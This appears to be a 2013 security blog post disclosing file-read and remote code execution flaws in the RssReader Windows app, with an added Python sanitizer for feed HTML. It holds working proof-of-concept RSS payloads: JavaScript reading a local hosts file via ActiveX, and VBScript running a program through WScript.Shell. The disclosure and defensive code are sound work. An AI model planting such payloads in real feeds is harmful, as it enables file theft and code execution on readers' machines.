Wednesday, 26 June 2013

RssReader remote code execution vulnerability

Google Reader is officially shutting down on 1 July 2013. Not everyone has jumped ship yet, so I wouldn't be surprised to see a lot of people suddenly looking for new ways to read their RSS feeds next week.

Summary: Don't install RssReader! It's the top result on Google for "rss reader", but it also lets remote attackers steal your files and run arbitrary code on your computer. 

Several years ago, I discovered a remote code execution vulnerability in RssReader, a free RSS reader for Windows. To my amazement, this vulnerability is still present today. Even worse, this software is still the first result when you do a Google search for rss reader. I think this may result in quite a few installations of this vulnerable software next week, after Google Reader shuts down for good.

The latest stable release offered on the RssReader website is 1.0.88.0. This version was originally released way back in 2004! Unfortunately, for the past nine years, this version has contained a remote code execution vulnerability which allows malicious feeds to run arbitrary code on a victim's computer, or access the victim's files without consent.

The RssReader website reports more than 4.1 million downloads, but the real number is likely to be much higher, as that count does not appear to have been updated for more than two years (according to the archived pages at archive.org). 

Vulnerability 1: Accessing local files with JavaScript

RssReader executes JavaScript in a context that permits access to local files through an XMLHttpRequest object. An attacker can instantiate an XMLHttpRequest object within a malicious, remote RSS feed and then use it to read any readable file from a victim's computer. The contents of these files can then be transmitted to the remote attacker without the victim's consent or knowledge.

Vulnerability 2: Executing code on the victim's computer with VBScript

Unsurprisingly, RssReader also allows VBScript to be executed in a local context by its rendering engine. A remote attacker can instantiate a WScript.Shell object and use it to execute arbitrary code on the victim's computer. When I originally tested this on a fully-patched Windows XP machine with Internet Explorer 7, it was possible to execute programs merely by viewing a malicious RSS feed. On Windows 7 with IE 10, the user may have to click "Yes" to run the ActiveX control, depending on their security settings.

Proofs of concept

The following RSS document demonstrates how the file c:\windows\system32\drivers\etc\hosts can be accessed through a remote feed.

<rss version="2.0">
  <channel>
    <title>Title</title>
    <link>http://www.example.com/</link>
    <description>Description</description>
    <generator>highseverity.com</generator>
    <item>
      <title>Item Title</title>
      <link>http://www.example.com/</link>
      <description>
        <script>
var xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
xmlhttp.open("GET", "file:///c:/windows/system32/drivers/etc/hosts", true);
xmlhttp.onreadystatechange = function() {
    if (xmlhttp.readyState == 4) {
        alert(xmlhttp.responseText);
    }
}
xmlhttp.send(null);
        </script>
      </description>
      <author>highseverity.com</author>
    </item>
  </channel>
</rss>

When this feed is displayed within RssReader, the contents of the victim's hosts file will be displayed in a JavaScript alert dialog:

An attacker can also use the XMLHttpRequest object to send the contents of this file - plus other potentially sensitive files - to a remote web server. No user interaction is required, so a well-crafted attack is likely to go unnoticed by its victims.

Arbitrary programs can be executed on the victim's computer by creating a WScript.Shell object and calling its Run function. This can be demonstrated by creating a feed with the following script inside an RSS item:

<script language="VBScript">
<!--
    Set objShell = CreateObject("WScript.Shell")
    objShell.Run "calc.exe", 1, True
-->
</script>

When the victim views this feed, calc.exe will be executed:

As noted earlier, depending on the victim's operating system, browser version and security settings, this code execution vulnerability could also be exploited without requiring any user interaction, and a cleverly crafted attack is unlikely to be noticed by the victim.

Obviously, when a remote attacker is able to run arbitrary code on a victim's computer, it makes it a lot easier to gain unauthorised access to any of the victim's accounts on other sites and services, such as Facebook, Twitter, Gmail, Flickr, etc.

An attacker does not necessarily have to entice his victim into subscribing to a malicious feed; the vulnerability can also be exploited through a feed that the victim has already subscribed to, either by compromising the server hosting the feed, or by writing a specially-crafted blog post which is syndicated by other third-party feeds.

Mitigation

Unfortunately, RssReader does not appear to be maintained any more. The software has not been updated since 2004, the latest bugs listed on the website date from 2003, and emails to info@rssreader.com are being bounced. With that in mind, I'm surprised it's still the top result on Google for rss reader.

So for now, the only sensible thing to do is to avoid installing RssReader, and make sure everyone else avoids it, too!

It might appear reasonable and responsible for Google to place a warning in its search results, or perhaps even reduce its ranking in search results - particularly over the coming weeks.
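The root cause of both vulnerabilities is that feed content is handed to a browser rendering engine as trusted, locally-sourced HTML. As an added example (not code from the original post or from RssReader), the following Python script shows the minimum a maintained reader would need to do before rendering an item: parse the RSS, drop script-bearing elements, on* handlers and javascript:/vbscript: URLs from each description, and record what was stripped so that hostile feeds can be logged. The feed it parses is constructed for the example, and the FeedSanitizer and sanitize_feed names are hypothetical.

```python
import html
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

ACTIVE_TAGS = {"script", "object", "embed", "applet", "iframe"}  # execute code when rendered
BAD_SCHEMES = ("javascript:", "vbscript:", "data:")               # script-bearing URL schemes


class FeedSanitizer(HTMLParser):
    """Rebuilds item HTML, dropping active elements, on* handlers and script URLs."""
    def __init__(self):
        super().__init__()
        self.out, self.findings, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:          # drop the element and everything inside it
            self._skip += 1
            self.findings.append(f"<{tag}> element")
        elif not self._skip:
            bad = [n for n, v in attrs
                   if n.startswith("on") or (v or "").strip().lower().startswith(BAD_SCHEMES)]
            self.findings += [f"{n} attribute on <{tag}>" for n in bad]
            kept = "".join(f' {n}="{html.escape(v or "")}"' for n, v in attrs if n not in bad)
            self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in ACTIVE_TAGS:
            self._skip = max(0, self._skip - 1)
        elif not self._skip:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):        # text is re-escaped; HTML comments are dropped by default
        if not self._skip:
            self.out.append(html.escape(data, quote=False))


def sanitize_feed(rss_xml):
    """Return [(title, clean_html, findings)] for every <item> in an RSS 2.0 document."""
    results = []
    for item in ET.fromstring(rss_xml).iter("item"):
        desc = item.find("description")
        # A description may hold escaped HTML (text) or, as in the PoC above, literal child elements.
        raw = "" if desc is None else (desc.text or "") + "".join(
            ET.tostring(c, encoding="unicode") for c in desc)
        s = FeedSanitizer()
        s.feed(raw)
        results.append((item.findtext("title", ""), "".join(s.out).strip(), s.findings))
    return results


# Constructed sample feed (not a real one): item one mirrors the PoC layout, item two carries escaped HTML.
SAMPLE_FEED = """<rss version="2.0"><channel><title>t</title><item><title>one</title>
<description><p>hi</p><script>alert(1)</script></description></item><item><title>two</title>
<description>&lt;a href="vbscript:x" onclick="y"&gt;link&lt;/a&gt;</description></item></channel></rss>"""
```

Stripping active content is defence in depth only; the rendered result must also be loaded in a restricted zone with no ActiveX or file:// access, otherwise any parser bypass hands the attacker the same local context the post describes.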
